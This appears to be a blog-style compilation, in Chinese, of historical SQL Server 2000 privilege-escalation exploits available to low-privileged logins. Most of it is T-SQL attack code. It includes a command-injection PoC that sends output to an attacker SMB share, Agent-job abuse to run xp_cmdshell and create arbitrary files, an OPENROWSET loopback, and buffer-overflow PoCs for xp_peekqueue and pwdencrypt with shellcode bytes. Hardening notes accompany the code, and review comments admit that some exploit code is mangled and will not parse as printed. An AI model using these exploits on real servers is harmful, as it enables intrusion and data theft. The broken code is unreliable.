老调重弹:Microsoft SQL Server 中 public 权限的利用(SQL Server 2000 时代的历史技术汇总)

本人注:这些都是很老的技术,大部分只在未打补丁的 SQL Server 2000 上测试过,对 SQL Server 2005 基本不起作用。整理在这里主要作历史参考,以及作为加固检查清单:逐项核对 public 角色在 master/msdb 下是否仍对这些扩展存储过程、系统表和 Agent 作业过程保留执行或读写权限。
1.
xp_runwebtask 与 msdb.dbo.mswebtasks:默认情况下 public 角色对 mswebtasks 表拥有 Insert、Update、Delete 和 Select 权限,并且可以执行 xp_runwebtask。

任何能够通过 SQL Server 身份验证的攻击者(只需 public 权限)都可以删除、插入或更新其他用户建立的 Web 任务,并通过 xp_runwebtask 运行已有任务;由于这些任务最终以 SQL Server Agent 服务帐户的身份运行,攻击者可能借此以该帐户的权限执行任意操作系统命令,或把自己提升为 sysadmin 固定服务器角色成员。加固要点:撤销 public 对 mswebtasks 表的读写权限和对 xp_runwebtask 的执行权限,并让 Agent 以低权限帐户运行。
2.

多个 DBCC 命令对用户提交的参数缺少正确的缓冲区边界检查,向下列命令提交超长字符串作为参数可导致缓冲区溢出,进而可能在系统中执行任意指令(原文称以 SQL Server Agent Proxy 帐户的进程执行;但 DBCC 命令是在 sqlservr.exe 进程内执行的,溢出代码理应继承 SQL Server 服务帐户的权限)。各命令所需的最低权限见其后的 (a)–(d) 注释:
DBCC ADDEXTENDEDPROC ('xp_storedproc','XXX...') (a)
DBCC INDEXFRAG ('','XXX...') (b)
DBCC UpdateUSAGE ('','XXX...') (c)
DBCC CHECKCONSTRAINTS ('XXX...') (c)
DBCC SHOWCONTIG ('XXX...') (d)
DBCC CLEANTABLE ('','XXX...') (d)
(a) 仅 sysadmin 固定服务器角色成员可以运行。
(b) sysadmin 固定服务器角色、db_owner 或 db_ddladmin 固定数据库角色成员可以运行。
(c) sysadmin 固定服务器角色或 db_owner 固定数据库角色成员可以运行。
(d) 所有用户都可以运行。
因此,对只有 public 权限的攻击者而言,真正有意义的只有标注 (d) 的 DBCC SHOWCONTIG 和 DBCC CLEANTABLE;其余几项属于已取得高权限后的进一步利用。
3.
Microsoft SQL Server 中用于复制的存储过程 sp_MScopyscriptfile 对用户提交的参数缺少正确的过滤,能够连接到数据库的攻击者可以借此以 SQL Server Agent Proxy 帐户的权限在系统上执行任意命令(前提条件见下文)。
sp_MScopyscriptfile 存储过程会在 SQL Server 的复制目录下建立目录,然后把脚本拷贝到该目录中。它有一个 @scriptfile 输入参数,用于指定要拷贝的脚本文件名;存储过程对这个外部可控的参数缺少过滤,攻击者可以在其中注入操作系统命令,由存储过程内部调用的 xp_cmdshell 执行。若系统中已配置 SQL Server Agent Proxy 帐户,攻击者即可以该帐户的权限执行任意命令;不过默认情况下 Agent Proxy 帐户需要 SQL 管理员权限才能启用,因此非 sysadmin 用户能否利用,取决于管理员是否已经开启了该帐户。下面的 PoC 把一条 dir 命令的输出写到攻击者控制的 SMB 共享上:

-- Item 3 PoC: OS command injection through sp_MScopyscriptfile's first
-- (@scriptfile) parameter. The embedded quotes and pipes in @scripfile are
-- shaped to break out of the file-name argument that the procedure passes to
-- xp_cmdshell (see the prose above); verify the exact quoting against the
-- procedure body of the target build before relying on it.
-- Hardening: revoke public EXECUTE on sp_MScopyscriptfile, disable xp_cmdshell,
-- and do not enable the SQL Server Agent Proxy account for non-sysadmin use.
declare @command varchar(100)
declare @scripfile varchar(200)   -- sic: misspelled, but used consistently below
-- Make sure a NULL fragment cannot silently blank out the concatenated payload.
set concat_null_yields_null off
-- OS command to smuggle in: directory listing exfiltrated to an attacker SMB share.
-- NOTE(review): the literal is wrapped across two lines by the blog paste, so as
-- printed it contains a newline; restore it to a single line before running.
select @command='dir c:\ >
"\\attackerip\share\dir.txt"'
-- Injection wrapper: <bogus file> > nul" | <command> | rd "
select @scripfile='c:\autoexec.bat > nul" | ' +
@command + ' | rd "'
-- Second argument (destination) left empty on purpose.
exec sp_MScopyscriptfile @scripfile ,''
4.
Microsoft SQL Server sp_replwritetovarbin() 堆溢出利用。注意:与上面几条不同,这个漏洞同样影响 SQL Server 2005(SP2 及更早),微软于 2009 年通过 MS09-004(CVE-2008-5416)修复;微软当时给出的临时缓解措施正是拒绝 public 对该过程的执行权限。
http://hi.baidu.com/hack_forensic/blog/item/be1ea0142951b75bf3de32d9.html (hi.baidu.com 博客平台已关闭,此链接很可能失效,可在公开漏洞库中按上述编号检索。)
5.
sp_add_job、sp_add_jobstep:通过 SQL Server Agent 作业,让 T-SQL 步骤以 Agent 服务帐户的身份运行(而不是以调用者自己的会话身份)。
-- Item 5: privilege escalation via a SQL Server Agent job. The caller only
-- needs the right to create jobs in msdb; the job step is then executed by the
-- Agent, not by the caller's session. The step itself goes through
-- xp_execresultset (see item 7), whose result set is executed as T-SQL, so the
-- nested xp_cmdshell ends up running with the Agent's privileges.
-- Proof of execution: c:\agent-job-results.txt appears on the server.
-- Defender notes: alert on job creation by non-sysadmin logins and on job
-- steps that mention xp_cmdshell / xp_execresultset; revoke public EXECUTE on
-- sp_add_job* for non-admin logins where not needed.
USE msdb
-- NOTE(review): @delete_level = 1 presumably means "delete the job once it
-- succeeds", i.e. the job cleans up after itself — confirm against sp_add_job.
-- The @description literal is wrapped by the blog paste and contains a newline;
-- that is harmless (it is only descriptive text).
EXEC sp_add_job @job_name = 'GetSystemOnSQL',
@enabled = 1,
@description = 'This will give a low privileged user access to
xp_cmdshell',
@delete_level = 1
-- Single T-SQL step. The @command string is doubly nested: the outer literal
-- holds an xp_execresultset call, whose first argument is a SELECT returning
--   exec master..xp_cmdshell "dir > c:\agent-job-results.txt"
-- and whose second argument is the database to run it in. The line break
-- inside the literal is whitespace in the nested T-SQL and does not matter.
EXEC sp_add_jobstep @job_name = 'GetSystemOnSQL',
@step_name = 'Exec my sql',
@subsystem = 'TSQL',
@command = 'exec master..xp_execresultset N''select ''''exec
master..xp_cmdshell "dir > c:\agent-job-results.txt"'''''',N''Master'''
-- 'SERVER_NAME' is a placeholder: the Agent instance that should pick up the job.
EXEC sp_add_jobserver @job_name = 'GetSystemOnSQL',
@server_name = 'SERVER_NAME'
-- Kick it off immediately instead of waiting for a schedule.
EXEC sp_start_job @job_name = 'GetSystemOnSQL'
6.
-- Item 6: arbitrary file creation via the Agent job step's @output_file_name.
-- The step only SELECTs a string, but the Agent writes the step output to the
-- path given in @output_file_name, with whatever NTFS rights the Agent
-- service account has. Proof of execution: c:\sqlafc123.txt.
-- Same preconditions and defender notes as item 5 (job creation rights in
-- msdb; watch for @output_file_name pointing outside the Agent log directory).
USE msdb
-- NOTE(review): @delete_level = 1 presumably removes the job after success —
-- confirm against sp_add_job.
EXEC sp_add_job @job_name = 'ArbitraryFileCreate',
@enabled = 1,
@description = 'This will create a file called c:\sqlafc123.txt',
@delete_level = 1
-- The SELECT result (plus whatever header/footer the Agent adds — not shown
-- here) becomes the contents of the output file.
EXEC sp_add_jobstep @job_name = 'ArbitraryFileCreate',
@step_name = 'SQLAFC',
@subsystem = 'TSQL',
@command = 'select ''hello, this file was created by the SQL Agent.''',
@output_file_name = 'c:\sqlafc123.txt'
-- 'SERVER_NAME' is a placeholder for the target Agent instance.
EXEC sp_add_jobserver @job_name = 'ArbitraryFileCreate',
@server_name = 'SERVER_NAME'
EXEC sp_start_job @job_name = 'ArbitraryFileCreate'
7.
xp_execresultset、xp_printstatements、xp_displayparamstmt:这三个扩展存储过程都会在服务器端执行传入的 T-SQL 字符串,下例通过 xp_displayparamstmt 间接调用 xp_cmdshell:
-- Item 7: xp_displayparamstmt executes the T-SQL passed as its first argument;
-- from the values used here the second argument is apparently the database
-- name and the third a flag — confirm against the original advisory. The
-- payload nests xp_cmdshell; proof of execution is c:\esp-results.txt.
-- NOTE(review): the escalation presumably comes from the XP opening its own
-- connection back to the server (i.e. not running as the caller) — verify.
-- Hardening: revoke public EXECUTE on xp_displayparamstmt, xp_execresultset
-- and xp_printstatements; they are undocumented and have no business being
-- callable by ordinary logins.
exec xp_displayparamstmt N'exec master..xp_cmdshell ''dir > c:\esp-results.txt''',N'master',1
8.
xp_peekqueue(超长参数导致的缓冲区溢出;下面的代码只针对 Windows 2000 SP2 硬编码了地址,其他版本的分支留空,需要自行补齐)
-- Item 8: xp_peekqueue buffer-overflow PoC (SQL Server 2000 on Windows 2000).
-- The oversized first argument is assembled from, in order:
--   a long run of '1's, an AAAABBBB...ZZZZ marker (used while developing the
--   exploit to find the return-address offset), a short jump, the saved
--   return address overwrite (@sra), a small stub, the address of WinExec,
--   "call eax", "mov eax," + the address of ExitThread, "call eax", and the
--   NUL-terminated command line.
-- All three addresses are valid only for the Windows 2000 SP2 DLL layout the
-- author had; the SP1 / no-SP branches are left as 0x00000000 placeholders.
-- The varchar variables receive varbinary constants; the implicit conversion
-- keeps the raw bytes, which is how opcode bytes end up inside the string.
-- Historical only: this XP was patched in the SQL Server 2000 service packs of
-- that era. What is still worth checking on a hardening review is the pattern
-- itself — public EXECUTE on an undocumented xp_* procedure in master.
declare @query varchar(4000) declare @end_query varchar(500) declare @short_jump varchar(8)

declare @sra varchar(8) declare @call_eax varchar(4) declare @WinExec varchar(8) declare @mov varchar(4)
declare @ExitThread varchar(8)
declare @exploit_code varchar(200)
declare @command varchar(300)
declare @msver nvarchar (200)
declare @ver int
declare @sp nvarchar (20)
-- Command line as raw bytes; decodes to:  cmd.exe /c dir > c:\pwdencrypt.txt &
-- followed by NUL terminators. (The file name is shared with item 10 — copy/paste residue.)
-- NOTE(review): the hex literal is wrapped over two lines by the blog paste;
-- a T-SQL binary literal cannot span lines, so join them before running.
select @command =
0x636D642E657865202F6320646972203E20633A5C707764656E63727970742E747874202600
00

-- Service-pack detection: takes the third character from the end of @@version,
-- which on the author's builds is apparently the Windows SP digit
-- ('2' = 50, '1' = 49). Fragile — check what @@version ends with on the target.
select @sp = N'Service Pack '
select @msver = @@version
select @ver = ascii(substring(reverse(@msver),3,1))
-- NOTE(review): the if / else-if chain below was mangled by the blog's line
-- joining: the "else if @ver = 52" / "= 51" clauses have been swallowed into
-- the trailing "--" comments, and the SELECTs that should sit inside each
-- BEGIN ... END now follow the empty block. As printed this does not parse;
-- the intended structure is one BEGIN ... END per service pack wrapping the
-- three address assignments that follow it.
if @ver = 53
print @sp + char(@ver) -- Windows 2000 SP5 For when it comes out. else if @ver = 52
print @sp + char(@ver) -- Windows 2000 SP4 For when it comes out. else if @ver = 51
print @sp + char(@ver) -- Windows 2000 SP3 For when it comes out.
else if @ver = 50 -- Windows 2000 Service Pack 2
BEGIN
END

-- Windows 2000 SP2 addresses (written as the little-endian byte sequence the
-- overflow needs; 0x43E5E677 is the dword 0x77E6E543 in memory, and likewise
-- for the other two).
print @sp + char(@ver)
select @sra = 0x43E5E677
select @WinExec = 0xAFA7E977
select @ExitThread = 0xE275E877
else if @ver = 49 -- Windows 2000 Service Pack 1
BEGIN
END

-- SP1 placeholders. NOTE(review): because the three statements were joined on
-- one line, the "--" comment after the first one comments out the other two,
-- and the "0x00000000" on the next line is left as a stray token.
select @sra = 0x00000000 --need to get address select @WinExec = 0x00000000 --need to get address select @ExitThread =
0x00000000 --need to get address
else -- No Windows 2000 Service Pack
BEGIN
END

-- No-SP placeholders (same line-joining problem on the second line).
select @sra = 0x00000000 --need to get address
select @WinExec = 0x00000000 --need to get address select @ExitThread = 0x00000000 --need to get address
-- Start of the dynamic SQL: the overflow string is the first argument to
-- xp_peekqueue. The line breaks (including the blank line) inside this literal
-- are part of the string and add to its length; the blog wrapping has very
-- likely changed the original offsets.
select @query = 'exec xp_peekqueue
''1111111111111111111111111111111111111111111111111111111111111111111111111111

11111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLL
LLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ'
-- Closes the first argument and supplies two dummy arguments 'a','a'.
select @end_query = ''',''a'',''a'''
-- EB 0A = jmp short +10 (hops over the overwritten return address), 90 90 = nop.
select @short_jump = 0xEB0A9090
-- B8 = mov eax, imm32; the imm32 is @ExitThread, appended right after it below.
select @mov = 0xB8
-- 10 x nop; push ebp; mov ebp,esp; xor eax,eax; push eax; lea eax,[ebx+2Ah];
-- push eax; B8 (mov eax, imm32 — @WinExec follows). I.e. it sets up
-- WinExec(<string at ebx+2Ah>, 0), assuming ebx points near the payload at
-- crash time.
select @exploit_code = 0x90909090909090909090558BEC33C0508D432A50B8
-- FF D0 = call eax.
select @call_eax = 0xFFD0
-- Assemble the payload and run it. exec(@query) is dynamic SQL built by string
-- concatenation — the same construct that makes this attack possible in the
-- first place when an application does it with user input.
select @query = @query + @short_jump + @sra + @exploit_code + @WinExec + @call_eax +
@mov + @ExitThread + @call_eax + @command + @end_query exec (@query)
9. OPENROWSET:利用 ad hoc 分布式查询让 SQL Server 用自己的服务帐户(Trusted_Connection=Yes)回连 Data Source 指定的实例(通常就是本机);若该帐户在目标实例上是 sysadmin,查询就以 sysadmin 身份执行,从而调用 xp_cmdshell。
-- Item 9: ad hoc distributed query back to the server itself.
-- Trusted_Connection=Yes makes the SQL Server process authenticate to
-- 'myserver' (placeholder: the target instance, typically the same box) with
-- its own Windows service account rather than as the caller. If that account
-- maps to sysadmin on the target, the query text — here xp_cmdshell — runs as
-- sysadmin regardless of the caller's rights. SET FMTONLY OFF presumably
-- prevents the provider's metadata-only pass from suppressing real execution.
-- Hardening: disable ad hoc distributed queries (DisallowAdhocAccess for the
-- provider), and never run the service under an account that is a sysadmin
-- login on itself or on any reachable instance.
Select * FROM OPENROWSET('SQLOLEDB','Trusted_Connection=Yes;Data Source=myserver',
'SET FMTONLY OFF execute master..xp_cmdshell "dir c:\"')

10. pwdencrypt:向该函数传入超长参数导致的缓冲区溢出;和第 8 条一样只针对 Windows 2000 SP2 硬编码了地址,其他分支留空。
-- Item 10: pwdencrypt() buffer-overflow PoC (SQL Server 2000 on Windows 2000).
-- The oversized nvarchar argument is assembled from: a filler of repeated
-- "NGSSQuirreL" (apparently the name of the NGSSoftware scanner — this PoC
-- looks lifted from their advisory), the saved return address overwrite
-- (@sra), a short jump, 8 bytes of extra padding, a small stub, the address
-- of WinExec, two "call eax", and the NUL-terminated command line.
-- Unlike item 8 everything here is nvarchar: the varbinary constants are kept
-- as raw bytes (UTF-16 code units), so the byte sequence in memory is what is
-- written. Addresses are valid only for Windows 2000 SP2; the SP1 / no-SP
-- branches are 0x00000000 placeholders.
-- Historical only (fixed in the SQL Server 2000 service packs of that era);
-- the hardening takeaway is that pwdencrypt() is callable by any login.
declare @msver nvarchar (200)
declare @ver int
declare @sp nvarchar (20)

declare @call_eax nvarchar(8) declare @exploit nvarchar(2000) declare @padding nvarchar(200)
declare @exploit_code nvarchar(1000)
declare @sra nvarchar(8)
declare @short_jump nvarchar(8)
declare @a_bit_more_pad nvarchar (16)
declare @WinExec nvarchar(16)
declare @command nvarchar(300)
-- Command line as raw bytes; decodes to:  cmd.exe /c dir > c:\pwdencrypt.txt
-- followed by NUL terminators.
-- NOTE(review): the hex literal is wrapped over two lines by the blog paste;
-- a T-SQL binary literal cannot span lines, so join them before running.
select @command =
0x636D642E657865202F6320646972203E20633A5C707764656E63727970742E747874000000
00
-- Service-pack detection: third character from the end of @@version, which on
-- the author's builds is apparently the Windows SP digit ('2' = 50, '1' = 49).
-- Fragile — check what @@version ends with on the target.
select @sp = N'Service Pack '
select @msver = @@version
select @ver = ascii(substring(reverse(@msver),3,1))

-- NOTE(review): as in item 8, the blog's line joining swallowed the
-- "else if @ver = 52" / "= 51" clauses into the trailing "--" comments, and
-- the SP2 / no-SP assignments now sit after their empty BEGIN ... END blocks.
-- As printed this does not parse; each BEGIN ... END was presumably meant to
-- wrap the print + two address assignments that follow it.
if @ver = 53
print @sp + char(@ver) -- Windows 2000 SP5 For when it comes out. else if @ver = 52
print @sp + char(@ver) -- Windows 2000 SP4 For when it comes out. else if @ver = 51
print @sp + char(@ver) -- Windows 2000 SP3 For when it comes out.
else if @ver = 50 -- Windows 2000 Service Pack 2
BEGIN
END

-- Windows 2000 SP2 addresses (little-endian byte order: 0x2B49E277 is the
-- dword 0x77E2492B in memory). Note @WinExec is the same value as in item 8.
print @sp + char(@ver)
select @sra = 0x2B49E277
select @WinExec = 0xAFA7E977
else if @ver = 49 -- Windows 2000 Service Pack 1
BEGIN
print @sp + char(@ver)
-- NOTE(review): the "--" comment after the first assignment comments out the
-- @WinExec assignment that was joined onto the same line.
select @sra = 0x00000000 -- Need to get address select @WinExec = 0x00000000 -- Need to get address
END
else -- No Windows 2000 Service Pack
BEGIN
END

-- No-SP placeholders.
print @sp + char(@ver)
select @sra = 0x00000000 -- Need to get address
select @WinExec = 0x00000000 -- Need to get address
-- EB 0A = jmp short +10, 90 90 = nop.
select @short_jump = 0xEB0A9090
-- Filler that reaches the saved return address. NOTE(review): the literal is
-- line-wrapped by the blog paste and contains a stray space before the final
-- "eLNGSSQuirreL*"; since the offset depends on the exact length, restore it
-- as one unbroken string.
select @padding = N'NGSSQuirreLNGSSQuirreLNGSSQuirreLNGSSQuirreLNGSSQuirreLNGSSQuirreLNGSSQuirr
eLNGSSQuirreLNGSSQuirreLNGSSQuirreLNGSSQuirreLNGSSQuirreLNGSSQuirreLNGSSQuirr eLNGSSQuirreL*'
-- 8 bytes of padding (four U+0060 '`' characters when read as UTF-16).
select @a_bit_more_pad = 0x6000600060006000
-- nop; push ebp; mov ebp,esp; xor eax,eax; push eax; lea eax,[ebp+24h];
-- push eax; B8 (mov eax, imm32 — @WinExec follows). I.e. WinExec(<string at
-- ebp+24h>, 0).
select @exploit_code = 0x90558BEC33C0508D452450B8
-- FF D0 FF D0 = call eax; call eax.
select @call_eax = 0xFFD0FFD0
-- Assemble the payload and hand it to pwdencrypt(); the overflow happens
-- inside the function, so there is nothing to "exec" here.
select @exploit = @padding + @sra + @short_jump + @a_bit_more_pad + @exploit_code +
@WinExec + @call_eax +@command select pwdencrypt(@exploit)


